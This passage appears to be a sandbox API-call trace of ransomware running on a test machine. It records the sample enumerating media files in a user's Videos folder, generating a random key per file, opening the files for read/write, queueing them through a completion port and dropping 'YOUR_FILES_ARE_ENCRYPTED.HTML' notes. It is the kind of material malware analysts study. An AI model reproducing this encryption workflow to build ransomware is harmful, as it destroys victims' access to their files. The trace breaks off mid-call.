ftCreationTime.dwHighDateTime=0x1d7de7a, ftLastAccessTime.dwLowDateTime=0x9e28d6b0, ftLastAccessTime.dwHighDateTime=0x1d7e359, ftLastWriteTime.dwLowDateTime=0x9e28d6b0, ftLastWriteTime.dwHighDateTime=0x1d7e359, nFileSizeHigh=0x0, nFileSizeLow=0xb2fe, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="eZBMqRDX_SY1Cjf.swf", cAlternateFileName="EZBMQR~1.SWF")) returned 1 [0168.885] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\eZBMqRDX_SY1Cjf.swf") returned 62 [0168.885] lstrcmpW (lpString1="eZBMqRDX_SY1Cjf.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.885] PathFindExtensionW (pszPath="eZBMqRDX_SY1Cjf.swf") returned=".swf" [0168.885] lstrlenW (lpString=".swf") returned 4 [0168.885] PathFindExtensionW (pszPath="eZBMqRDX_SY1Cjf.swf") returned=".swf" [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dc4c20, ftCreationTime.dwHighDateTime=0x1d7de05, ftLastAccessTime.dwLowDateTime=0xc861c640, ftLastAccessTime.dwHighDateTime=0x1d7e1ff, ftLastWriteTime.dwLowDateTime=0xc861c640, ftLastWriteTime.dwHighDateTime=0x1d7e1ff, nFileSizeHigh=0x0, nFileSizeLow=0x13cb0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="gXcjn.swf", cAlternateFileName="")) returned 1 [0168.885] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\gXcjn.swf") returned 52 [0168.885] lstrcmpW (lpString1="gXcjn.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.885] PathFindExtensionW (pszPath="gXcjn.swf") returned=".swf" [0168.885] lstrlenW (lpString=".swf") returned 4 [0168.885] PathFindExtensionW (pszPath="gXcjn.swf") returned=".swf" [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dc4c20, ftCreationTime.dwHighDateTime=0x1d7de05, ftLastAccessTime.dwLowDateTime=0xc861c640, ftLastAccessTime.dwHighDateTime=0x1d7e1ff, ftLastWriteTime.dwLowDateTime=0xc861c640, ftLastWriteTime.dwHighDateTime=0x1d7e1ff, nFileSizeHigh=0x0, nFileSizeLow=0x13cb0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="gXcjn.swf", cAlternateFileName="")) returned 0 [0168.885] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.885] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0168.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\gax8ifuharl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.886] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.888] CloseHandle (hObject=0x5e4) returned 1 [0168.888] GetProcessHeap () returned 0x270000 [0168.889] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.889] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e18300, ftCreationTime.dwHighDateTime=0x1d7e287, ftLastAccessTime.dwLowDateTime=0xf92b10c0, ftLastAccessTime.dwHighDateTime=0x1d7e645, ftLastWriteTime.dwLowDateTime=0xf92b10c0, ftLastWriteTime.dwHighDateTime=0x1d7e645, nFileSizeHigh=0x0, nFileSizeLow=0x17230, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IvgoCQULr.mp4", cAlternateFileName="IVGOCQ~1.MP4")) returned 1 [0168.889] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4") returned 44 [0168.889] lstrcmpW (lpString1="IvgoCQULr.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.889] PathFindExtensionW (pszPath="IvgoCQULr.mp4") returned=".mp4" [0168.889] lstrlenW (lpString=".mp4") returned 4 [0168.889] PathFindExtensionW (pszPath="IvgoCQULr.mp4") returned=".mp4" [0168.889] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\ivgocqulr.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.890] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=94768) returned 1 [0168.890] GetProcessHeap () returned 0x270000 [0168.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7631300 [0168.893] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="92") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="86") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="39") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1A") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="BF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="37") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="FF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E2") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="BE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="AE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="21") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="55") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B9") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="70") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="28") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="5E") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="FC") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7F") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="EB") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="E4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="E6") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C3") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="B4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B9") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9E") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="B1") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="CE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="DD") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="88") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="58") returned 2 [0168.895] lstrcpyW (in: lpString1=0x76413b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" [0168.895] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7631300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.895] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7631300, lpOverlapped=0x7631300) returned 1 [0168.895] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="llqHI_L IUsBmama", cAlternateFileName="LLQHI_~1")) returned 1 [0168.895] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama") returned 47 [0168.895] GetProcessHeap () returned 0x270000 [0168.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.895] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama" [0168.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*" [0168.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.895] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.895] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6425ca0, ftCreationTime.dwHighDateTime=0x1d7d7af, ftLastAccessTime.dwLowDateTime=0x921b4d10, ftLastAccessTime.dwHighDateTime=0x1d7da5f, ftLastWriteTime.dwLowDateTime=0x921b4d10, ftLastWriteTime.dwHighDateTime=0x1d7da5f, nFileSizeHigh=0x0, nFileSizeLow=0xf44, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="cwKqIbrhHjG18 WH.mkv", cAlternateFileName="CWKQIB~1.MKV")) returned 1 [0168.895] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\cwKqIbrhHjG18 WH.mkv") returned 68 [0168.895] lstrcmpW (lpString1="cwKqIbrhHjG18 WH.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.895] PathFindExtensionW (pszPath="cwKqIbrhHjG18 WH.mkv") returned=".mkv" [0168.895] lstrlenW (lpString=".mkv") returned 4 [0168.896] PathFindExtensionW (pszPath="cwKqIbrhHjG18 WH.mkv") returned=".mkv" [0168.896] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b400230, ftCreationTime.dwHighDateTime=0x1d7d982, ftLastAccessTime.dwLowDateTime=0x3c906cc0, ftLastAccessTime.dwHighDateTime=0x1d7dab6, ftLastWriteTime.dwLowDateTime=0x3c906cc0, ftLastWriteTime.dwHighDateTime=0x1d7dab6, nFileSizeHigh=0x0, nFileSizeLow=0x715e, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="dXc8SgpPrc-ET AvuZ8.avi", cAlternateFileName="DXC8SG~1.AVI")) returned 1 [0168.896] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi") returned 71 [0168.896] lstrcmpW (lpString1="dXc8SgpPrc-ET AvuZ8.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.896] PathFindExtensionW (pszPath="dXc8SgpPrc-ET AvuZ8.avi") returned=".avi" [0168.896] lstrlenW (lpString=".avi") returned 4 [0168.896] PathFindExtensionW (pszPath="dXc8SgpPrc-ET AvuZ8.avi") returned=".avi" [0168.896] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\dxc8sgpprc-et avuz8.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0168.896] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29022) returned 1 [0168.896] GetProcessHeap () returned 0x270000 [0168.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7659458 [0168.900] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="35") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A8") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CF") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="3D") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8E") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BB") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="64") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D5") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="61") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="89") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="65") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8A") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="6B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="53") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="6B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="53") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5E") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="31") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="4D") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="AF") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="CF") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="77") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B0") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="77") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="79") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="35") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="4D") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="39") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A4") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="67") returned 2 [0168.901] lstrcpyW (in: lpString1=0x766950c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" [0168.901] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x7659458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.901] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7659458, lpOverlapped=0x7659458) returned 1 [0168.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598c4ef0, ftCreationTime.dwHighDateTime=0x1d7e701, ftLastAccessTime.dwLowDateTime=0xc8d341f0, ftLastAccessTime.dwHighDateTime=0x1d7e77f, ftLastWriteTime.dwLowDateTime=0xc8d341f0, ftLastWriteTime.dwHighDateTime=0x1d7e77f, nFileSizeHigh=0x0, nFileSizeLow=0x1542a, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="rU1a5NOEKgMT0KbZLa.avi", cAlternateFileName="RU1A5N~1.AVI")) returned 1 [0168.902] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi") returned 70 [0168.902] lstrcmpW (lpString1="rU1a5NOEKgMT0KbZLa.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.902] PathFindExtensionW (pszPath="rU1a5NOEKgMT0KbZLa.avi") returned=".avi" [0168.902] lstrlenW (lpString=".avi") returned 4 [0168.902] PathFindExtensionW (pszPath="rU1a5NOEKgMT0KbZLa.avi") returned=".avi" [0168.902] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\ru1a5noekgmt0kbzla.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0168.902] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=87082) returned 1 [0168.902] GetProcessHeap () returned 0x270000 [0168.902] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7781160 [0168.906] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="C8") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3F") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0E") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="40") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="83") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6D") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F4") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B4") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CE") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="40") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="72") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D6") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4D") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F7") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="80") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5C") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EB") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="03") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C9") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="77") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="34") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="BC") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0A") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="01") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A1") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="6E") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C1") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="90") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CE") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="47") returned 2 [0168.907] lstrcpyW (in: lpString1=0x7791214, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" [0168.907] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7781160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.907] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7781160, lpOverlapped=0x7781160) returned 1 [0168.907] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedfa3b30, ftCreationTime.dwHighDateTime=0x1d7ddfe, ftLastAccessTime.dwLowDateTime=0x63d5cdd0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x63d5cdd0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x6cc, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TgNXZNShVhPaImwZH9B.mp4", cAlternateFileName="TGNXZN~1.MP4")) returned 1 [0168.907] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4") returned 71 [0168.908] lstrcmpW (lpString1="TgNXZNShVhPaImwZH9B.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.908] PathFindExtensionW (pszPath="TgNXZNShVhPaImwZH9B.mp4") returned=".mp4" [0168.908] lstrlenW (lpString=".mp4") returned 4 [0168.908] PathFindExtensionW (pszPath="TgNXZNShVhPaImwZH9B.mp4") returned=".mp4" [0168.908] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\tgnxznshvhpaimwzh9b.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0168.909] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1740) returned 1 [0168.909] GetProcessHeap () returned 0x270000 [0168.909] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 